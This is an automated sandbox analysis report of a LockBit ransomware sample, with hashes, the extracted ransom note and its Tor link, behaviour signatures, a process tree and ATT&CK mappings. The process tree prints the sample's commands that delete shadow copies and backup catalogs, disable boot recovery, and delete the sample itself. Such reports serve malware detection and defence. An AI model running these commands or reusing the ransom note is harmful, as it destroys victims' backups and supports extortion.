Analysis

  • max time kernel
    143s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    19-06-2020 17:58

General

  • Target

    Lockbit.bin.exe

  • Size

    101KB

  • MD5

    889328e2cf5f5d74531b9b0a25c1871c

  • SHA1

    d14a6e699a1f0805bd1248c80c2dc9dfccf0f403

  • SHA256

    0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f

  • SHA512

    f14ed75d97d2cd7e351f3cf75f9f374c2e9e388a1f5855a478d50b098b1250a67e375bdbd193b24d00bc052e0b3f8018cb3e74760be8c40b860be9f3d0ba2493

Malware Config

Extracted

Path

C:\Program Files\7-Zip\Restore-My-Files.txt

Family

lockbit

Ransom Note
All your important files are encrypted! Any attempts to restore your files with the thrid-party software will be fatal for your files! RESTORE YOU DATA POSIBLE ONLY BUYING private key from us. There is only one way to get your files back: | 1. Download Tor browser - https://www.torproject.org/ and install it. | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?D0407AC9D97C78CBCEB996649AC036A0 This link only works in Tor Browser! | 3. Follow the instructions on this page ### Attention! ### # Do not rename encrypted files. # Do not try to decrypt using third party software, it may cause permanent data loss. # Decryption of your files with the help of third parties may cause increased price(they add their fee to our) # Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org # Tor Browser user manual https://tb-manual.torproject.org/about
URLs

http://lockbitks2tvnmwk.onion/?D0407AC9D97C78CBCEB996649AC036A0

Signatures

  • Deletes itself 1 IoCs
  • Enumerates connected drives 3 TTPs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Lockbit

    Ransomware family with multiple variants released since late 2019.

  • Deletes system backup catalog 2 TTPs

    Ransomware often tries to delete backup files to inhibit system recovery.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies control panel 2 IoCs
  • Drops file in Program Files directory 9676 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Adds Run entry to start application 2 TTPs 2 IoCs
  • Modifies service 2 TTPs 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Lockbit.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\Lockbit.bin.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Sets desktop wallpaper using registry
    • Suspicious use of WriteProcessMemory
    • Modifies control panel
    • Drops file in Program Files directory
    • Suspicious use of AdjustPrivilegeToken
    • Adds Run entry to start application
    PID:1156
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1500
      • C:\Windows\system32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1820
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1868
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:1628
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled no
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:1664
      • C:\Windows\system32\wbadmin.exe
        wbadmin delete catalog -quiet
        3⤵
        • Deletes backup catalog
        PID:1548
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 20 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\Lockbit.bin.exe"
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:2780
      • C:\Windows\SysWOW64\PING.EXE
        ping 1.1.1.1 -n 20
        3⤵
        • Runs ping.exe
        PID:2812
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1788
  • C:\Windows\system32\wbengine.exe
    "C:\Windows\system32\wbengine.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2028
  • C:\Windows\System32\vdsldr.exe
    C:\Windows\System32\vdsldr.exe -Embedding
    1⤵
      PID:868
    • C:\Windows\System32\vds.exe
      C:\Windows\System32\vds.exe
      1⤵
        PID:1496

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Command-Line Interface

      1
      T1059

      Persistence

      Registry Run Keys / Startup Folder

      1
      T1060

      Modify Existing Service

      1
      T1031

      Defense Evasion

      File Deletion

      4
      T1107

      Modify Registry

      3
      T1112

      Discovery

      Query Registry

      1
      T1012

      Peripheral Device Discovery

      1
      T1120

      System Information Discovery

      1
      T1082

      Remote System Discovery

      1
      T1018

      Impact

      Inhibit System Recovery

      5
      T1490

      Defacement

      1
      T1491

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1500-0-0x0000000000000000-mapping.dmp
      • memory/1548-5-0x0000000000000000-mapping.dmp
      • memory/1628-3-0x0000000000000000-mapping.dmp
      • memory/1664-4-0x0000000000000000-mapping.dmp
      • memory/1820-1-0x0000000000000000-mapping.dmp
      • memory/1868-2-0x0000000000000000-mapping.dmp
      • memory/2780-6-0x0000000000000000-mapping.dmp
      • memory/2812-7-0x0000000000000000-mapping.dmp